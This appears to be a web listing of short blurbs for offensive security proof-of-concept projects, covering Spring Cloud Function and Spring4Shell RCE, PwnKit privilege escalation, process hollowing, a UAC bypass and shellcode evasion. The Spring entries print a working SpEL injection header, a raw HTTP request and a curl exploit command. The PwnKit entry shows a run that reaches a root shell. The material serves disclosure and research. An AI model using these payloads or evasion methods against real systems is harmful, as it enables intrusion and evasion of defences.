Pocsploit – A Lightweight, Flexible And Novel Open Source PoC Verification Framework

pocsploit is a lightweight, flexible and novel open source PoC verification framework. Pain points of the PoC frameworks on the market: there are too many params, I don’t know how to get started, but only some of them are commonly used; YAML PoC frameworks (like nuclei & xray) are not flexible enough; the conversion cost is …

Spring4Shell-POC – Dockerized Spring4Shell (CVE-2022-22965) PoC Application And Exploit

This is a dockerized application that is vulnerable to the Spring4Shell vulnerability (CVE-2022-22965). Full Java source for the WAR is provided and modifiable; the WAR is re-built whenever the Docker image is built. The built WAR is then loaded by Tomcat. There is nothing special about this application, it’s a simple hello world …

Spring-Spel-0Day-Poc – Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression, RCE, 0day, 0-day, POC, EXP

spring-cloud/spring-cloud-function RCE EXP POC: https://github.com/spring-cloud/spring-cloud-function
Header: spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app")
Build:
wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip
unzip v3.1.6.zip
cd spring-cloud-function-3.1.6
cd spring-cloud-function-samples/function-sample-pojo
mvn package
java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar
Get path lists for test:
find . -name "*.java"|xargs -I % cat %|grep -Eo '"([^" ./=>|,:}+)'"'"']{8,})"'|sort -u|sed 's/"//g'
… functionRouter uppercase lowercase …
poc1:
POST /functionRouter HTTP/1.1
host: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open …

CVE-2022-22963 – PoC Spring Java Framework 0-day Remote Code Execution Vulnerability

To run the vulnerable Spring Boot application, run this Docker container exposing it on port 8080. Example:
docker run -it -d -p 8080:8080 bobcheat/springboot-public
Exploit curl command:
curl -i -s -k -X $'POST' -H $'Host:' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/test")' --data-binary $'exploit_poc' $''
Or using Burp Suite:
Credits: https://github.com/hktalent/spring-spel-0day-poc

CVE-2022-27254 – PoC For Vulnerability In Honda’s Remote Keyless System

PoC for vulnerability in Honda’s Remote Keyless System (CVE-2022-27254). Disclaimer: For educational purposes only. Kindly note that the discoverers of this vulnerability are Ayyappan Rajesh, a student at UMass Dartmouth, and HackingIntoYourHeart. Others mentioned in this repository are credited for the support that they have provided but have played no active role in any research conducted …

PwnKit-Exploit – Proof Of Concept (PoC) CVE-2021-4034

Proof Of Concept (PoC) CVE-2021-4034. @c0br40x help to make this section in README!!
Proof of Concept:
[email protected]:~/PwnKit-Exploit$ make
cc -Wall exploit.c -o [email protected]:~/PwnKit-Exploit$
[email protected]:~/PwnKit-Exploit$ ./exploit
Current User before execute [email protected]$whoami: debian
Exploit written by @luijait (0x6c75696a616974)
[+] Enjoy your root if exploit was completed
[email protected]:/home/debian/PwnKit-Exploit#
Fix command: use sudo chmod 0755 pkexec to fix CVE-2021-4034.
Installation & Use …

NimHollow – Nim Implementation Of Process Hollowing Using Syscalls (PoC)

Playing around with the Process Hollowing technique using Nim. Features: direct syscalls for triggering Windows Native API functions with NimlineWhispers; shellcode encryption/decryption with AES in CTR mode; simple sandbox detection methods from the OSEP course by @offensive-security; AMSI patching with @rasta-mouse’s method is also inside (uncomment it for your needs). Usage. Installation: ~$ git clone …

DLLHijackingScanner – This Is A PoC For Bypassing UAC Using DLL Hijacking And Abusing The "Trusted Directories" Verification

This is a PoC for bypassing UAC using DLL hijacking and abusing the “Trusted Directories” verification. Generate Header from CSV: the Python script CsvToHeader.py can be used to generate a header file. By default it will use the CSV file dll_hijacking_candidates.csv that can be found here: dll_hijacking_candidates.csv. The script will check for each portable executable (PE) …

ThreadStackSpoofer – PoC For An Advanced In-Memory Evasion Technique Allowing To Better Hide Injected Shellcode’s Memory Allocation From Scanners And Analysts

[*] A PoC implementation for an advanced in-memory evasion technique that spoofs the thread call stack. This technique allows bypassing thread-based memory examination rules and better hiding shellcode while it is in process memory. Intro: This is an example implementation of the Thread Stack Spoofing technique, aiming to evade malware analysts, AVs and EDRs looking for references to shellcode’s …